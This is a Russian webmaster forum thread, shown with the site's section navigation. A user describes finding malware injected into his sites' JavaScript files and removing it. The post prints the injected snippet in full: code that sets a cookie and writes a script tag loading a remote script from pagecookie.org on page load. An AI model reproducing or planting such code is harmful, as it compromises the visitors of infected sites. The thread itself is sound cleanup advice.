- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Переиграть и победить: как анализировать конкурентов для продвижения сайта
С помощью Ahrefs
Александр Шестаков
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Полезная информация, может кому пригодится! На днях зашел в яндекс вебмастер, увидел, что несколько моих сайтов с пометкой
Пожалуйста, удалите вредоносный код. Если при новой проверке код не обнаружится, пометка в результатах поиска будет снята. Для того чтобы снять пометку как можно быстрее, сразу после удаления кода вы можете запросить перепроверку сайта.
Начал искать этот код, ни один сервис "онлайн проверки на вирусы" мне не помог, все утверждали, что все в порядке! Написал Платону, довольно быстро получил ответ с подсказкой куда копать!
вот этот код
function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000));if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<script src="http://pagecookie.org/pagecookie.js"></script>');}
Оказалось, что в конце каждого .JS файла он каким то образом прописался.... таких файлов сотни или даже тысячи! Скрипт, чтобы удалить код на сервере искать не стал. На днях делал бекапы всех сайтов, проверил выборочно код присутствовал.
Причем есть пару сайтов на народе и там тоже этот код прописался.
Выручила простая и очень удобная програмулина "Словогрыз" с ее помощью удалил этот код сразу на всех файлах. Настроил ее только на .js файлы добавил директорию на локале, где лежали все бекапы и вуаля! готово!
Далее перезалил файлы обратно на сервер и поменял фтп пароли. Теперь буду смотреть если опять пропишется эта бяка, будем думать дальше.
Полезная информация, может кому пригодится! На днях зашел в яндекс вебмастер, увидел, что несколько моих сайтов с пометкой
Мы такое уже проходили.
Не шартесь по Интерентам с открытыми FTP соединениями или залогиненой учеткой на укозе.